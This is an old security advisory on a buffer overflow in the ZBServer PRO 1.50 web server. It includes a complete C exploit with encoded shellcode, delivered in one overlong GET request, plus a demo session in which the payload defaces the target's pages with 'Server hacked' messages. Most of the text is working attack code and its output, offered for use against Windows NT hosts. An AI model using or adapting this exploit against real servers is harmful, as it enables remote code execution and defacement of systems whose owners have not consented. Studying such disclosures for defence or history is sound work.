Studying ZBServer 1.50-r1x overflow



              Advisory Name: ZBServer crash

          Advisory Released: [00/02/01]

                Application: personal web, ftp and gopher servers

                             on Win9x, WinNT

                   Severity: local/remote user with WebServer

                             privileges can run arbitrary code.

                     Status: overflow discovered by USSRBACK

                             http://www.ussrback.com

                     Author: izan@galaxycorp.com

                        WWW: http://www.deepzone.org

                             http://mareasvivas.cjb.net







        OVERVIEW

        ZBServer PRO 1.50 (all releases) has a buffer overflow in web

        server. Any local/remote user can run arbitrary code with web

        server privileges. Overflow was discovered by USSRBACK few weeks

        ago. The original USSRBACK post didn't contain any technical

        detail. The present document is a deep study about that advisory.

        It studies bug impact too.





        BACKGROUND

        Ideas and code were tested against Win9x and NT 4.0 sp 5 (all

        spanish version). The ZBServer PRO software is 1.50. All releases

        are affected (r13 to r17)





        DETAILS

        ZBServer PRO's WebServer has an overflow in "get command". It

        can't handle a long excesive request. When the string has a lenght

        about 766 bytes it crashs. The stack is overwritten.



        The vulnerability exists. USSRBACK' status (bof discovers) was

        originally:



        "Vendor Status: i email the vendor, and i dont have a responce :("



        We have exploited and finished our exploit for WinNT and it's

        attached with this advisory. Arbitrary code can run with

        webserver privileges.



        Win9x version can't be exploitable with a clear environment. If

        you have a default debugger configuration or your processes are

        handled by a special process hooking errors and exceptions then

        it can be exploited too but it won't be the common scenary.



        Win9x version can't run arbitrary code with a clear environment

        but a DoS attack is possible. You can crash the service with a

        local/remote request.





        EXPLOIT



        ZBServer PRO 1.50-r1x exploit gets remote servers's full control.

        When you attacks a vulnerable server you can run abitrary code

        inside. Firstly, sploit creates an advisory file. It's information

        for administrative use. Later, exploit restores and kills

        overflowed thread but before it patchs some error information so

        all error pages will appear like hacked pages.



        If you have problems running ZBServer they can be with your return

        address (remember that tests ran against WinNT sp5 spanish version).

        I could jump against edi register + 5 (more portable) but i will

        have a static dll address dependence. Well, it wasn't a clear jump

        so i decided to implement the first technique but the second is

        possible too.



        ex.







            % lynx http://xxx.xxx.xxx.xxx



            WELCOME TO ... blah ... blah ..... (It's the root page)



            % lynx xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html



            FILE NOT FOUND The request object (/ServerAbusedbyiZan.html) was

            not found.



            % lynx xxx.xxx.xxx.xxx/FileNotAvailable.html



            FILE NOT FOUND The request object (/FileNotAvailable.html) was not

            found.



            $ zbsploit xxx.xxx.xxx.xxx



            WinNT 4.0 sp5 ZBServer 1.50-r1x exploit http://mareasvivas.cjb.net -

            http://www.deepzone.org



            Coded by -=[|Zan]=- izan@galaxycorp.com - izan@deepzone.org



            done.



            $ lynx http://xxx.xxx.xxx.xxx



            WELCOME TO ... blah ... blah ..... (It's the root page again)



            % lynx http://xxx.xxx.xxx.xxx/ServerAbusedbyiZan.html



                Hello. You are running a ZBServer PRO's buggy version and



                                you have been abused.



                        More information can be downloaded from



                    http://www.deepzone.org or http://mareasvivas.cjb.net



                 regards to DeepZone crew (TheWizard, ^Anuska^ and Nemo)



                                   Coded by |Zan.







            % lynx xxx.xxx.xxx.xxx/FileNotAvailable.html



            Server hacked.



            http://www.deepzone.org Sploit coded by |Zan



            %_





                 ................................................





/** slzbserv.c - local/remote exploit for ZBServer PRO 1.50-r1x (WinNT)

 **

 ** ZBServer PRO 1.50-r1x exploit gets remote servers's full control.

 ** When you attacks a vulnerable server you can run abitrary code

 ** inside. Firstly, sploit creates an advisory file. It's information

 ** for administrative use. Later, exploit restores and kills

 ** overflowed thread but before it patchs some error information so

 ** all error pages will appear like hacked pages.

 **

 ** Compile on Debian with kernel 2.2.12: gcc -o  slzbserv slzbserv.c

 ** run: ./slzbserv hostname

 **

 ** http://mareasvivas.cjb.net / http://www.deepzone.org

 **

 ** Coded by |Zan | izan@galaxycorp.com

 **

 **/





#include <stdio.h>

#include <unistd.h>

#include <sys/socket.h>

#include <netinet/in.h>

#include <sys/errno.h>

#include <netdb.h>



#define _PORT   80

#define _TamBuf 770



char crash[] =

"GET /"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x81\xc7\xc8\x10\x10\x10\x81\xef\x10"

"\x10\x10\x10\x57\x5e\x33\xc0\x66\xb8\x31\x02\x90\x90\x50"

"\x59\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99\xc4\x18"

"\x74\xb1\x89\xd9\x99\xf3\x99\xf1\x19\x99\x99\x99\xf3\x9b"

"\xf3\x99\xf3\x99\xf1\x99\x99\x99\xd9\x14\x2c\xac\x8b\xd9"

"\x99\xcf\xf1\x19\x02\xd4\x99\xc3\x66\x8b\xc9\xc2\xf3\x99"

"\x14\x24\x3a\x89\xd9\x99\xaa\x59\x32\x14\x2c\x3a\x89\xd9"

"\x99\xcf\xf1\xd3\x98\x99\x99\x09\x14\x2c\x72\x89\xd9\x99"

"\xcf\xca\xf1\x49\x05\xd4\x99\xc3\x66\x8b\xca\xf1\x05\x02"

"\xd4\x99\xc3\x66\x8b\xf1\xa9\xd4\xde\x99\xc6\x14\x2c\x3e"

"\x89\xd9\x99\xf3\xdd\x09\x09\x09\x09\xc0\x35\x33\x7b\x65"

"\xf3\x99\x23\x31\x02\xd4\x99\x66\x8b\x99\x99\x99\x99\xca"

"\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc\xfd\xb7\xa5"

"\xb6\xf1\xab\xa7\xf1\xed\xed\xe9\xa3\xb6\xb6\xee\xee\xee"

"\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7\xfc\xb7\xf6\xeb\xfe\xb9"

"\xb9\xca\xe9\xf5\xf6\xf0\xed\xb9\xfa\xf6\xfd\xfc\xfd\xb9"

"\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb9\xe4\xa3\xb0\xa5\xf1\xed"

"\xf4\xf5\xa7\xa5\xf1\xfc\xf8\xfd\xa7\xa5\xed\xf0\xed\xf5"

"\xfc\xa7\xca\xfc\xeb\xef\xfc\xeb\xb9\xf1\xf8\xfa\xf2\xfc"

"\xfd\xb7\xa5\xb6\xed\xf0\xed\xf5\xfc\xa7\xa5\xb6\xf1\xfc"

"\xf8\xfd\xa7\xa5\xfb\xf6\xfd\xe0\xa7\xa5\xfa\xfc\xf7\xed"

"\xfc\xeb\xa7\xd1\xfc\xf5\xf5\xf6\xb7\xb9\xc0\xf6\xec\xb9"

"\xf8\xeb\xfc\xb9\xeb\xec\xf7\xf7\xf0\xf7\xfe\xb9\xf8\xb9"

"\xc3\xdb\xca\xfc\xeb\xef\xfc\xeb\xb9\xc9\xcb\xd6\xea\xb9"

"\xfb\xec\xfe\xfe\xe0\xb9\xef\xfc\xeb\xea\xf0\xf6\xf7\xb9"

"\xf8\xf7\xfd\xb9\xe0\xf6\xec\xb9\xf1\xf8\xef\xfc\xb9\xfb"

"\xfc\xfc\xf7\xb9\xf8\xfb\xec\xea\xfc\xfd\xb7\xa5\xe9\xa7"

"\xd4\xf6\xeb\xfc\xb9\xf0\xf7\xff\xf6\xeb\xf4\xf8\xed\xf0"

"\xf6\xf7\xb9\xfa\xf8\xf7\xb9\xfb\xfc\xb9\xfd\xf6\xee\xf7"

"\xf5\xf6\xf8\xfd\xb9\xff\xeb\xf6\xf4\xb9\xf1\xed\xed\xe9"

"\xa3\xb6\xb6\xee\xee\xee\xb7\xfd\xfc\xfc\xe9\xe3\xf6\xf7"

"\xfc\xb7\xf6\xeb\xfe\xb9\xf6\xeb\xb9\xf1\xed\xed\xe9\xa3"

"\xb6\xb6\xf4\xf8\xeb\xfc\xf8\xea\xef\xf0\xef\xf8\xea\xb7"

"\xfa\xf3\xfb\xb7\xf7\xfc\xed\xa5\xe9\xa7\xeb\xfc\xfe\xf8"

"\xeb\xfd\xea\xb9\xed\xf6\xb9\xdd\xfc\xfc\xe9\xc3\xf6\xf7"

"\xfc\xb9\xfa\xeb\xfc\xee\xb9\xb1\xcd\xf1\xfc\xce\xf0\xe3"

"\xf8\xeb\xfd\xb5\xb9\xd8\xf7\xec\xea\xf2\xf8\xb9\xf8\xf7"

"\xfd\xb9\xd7\xfc\xf4\xf6\xb0\xa5\xe9\xa7\xda\xf6\xfd\xfc"

"\xfd\xb9\xfb\xe0\xb9\xe5\xc3\xf8\xf7\xb7\xa5\xb6\xfa\xfc"

"\xf7\xed\xfc\xeb\xa7\xa5\xb6\xfb\xf6\xfd\xe0\xa7\xa5\xb6"

"\xf1\xed\xf4\xf5\xa7\xb7\xc5\xf1\xed\xf4\xf5\xc5\xca\xfc"

"\xeb\xef\xfc\xeb\xd8\xfb\xec\xea\xfc\xfd\xfb\xe0\xf0\xc3"

"\xf8\xf7\xb7\xf1\xed\xf4\xf5\x99\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

"\x90\x90\x90\x90\x90\xac\xe0\xe3\x01";





int     sock;

struct  sockaddr_in sock_a;

struct  hostent *host;



int main (int argc, char *argv[]) {



 printf("\nWinNT 4.0 sp5 ZBServer PRO 1.50-r1x exploit\n");

 printf("http://mareasvivas.cjb.net - http://www.deepzone.org\n\n");

 printf("Coded by -=[ |Zan ]=-  izan@galaxycorp.com - izan@deepzone.org\n\n");



 if(argc < 2) {

   fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);

   exit(0);

  }





 if((host=(struct hostent *)gethostbyname(argv[1])) == NULL) {

    perror("gethostbyname");

    exit(-1);

  }



 if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {

    perror("create socket");

    exit(-1);

  }



 sock_a.sin_family=AF_INET;

 sock_a.sin_port=htons(_PORT);

 memcpy((char *)&sock_a.sin_addr,(char *)host->h_addr,host->h_length);

 if(connect(sock,(struct sockaddr *)&sock_a,sizeof(sock_a))!=0) {

    perror("create connect");

    exit(-1);

  }



  fflush(stdout);



  write(sock,crash,_TamBuf);

  write(sock,"\n\n", 2);

  printf("done.\n\n");



}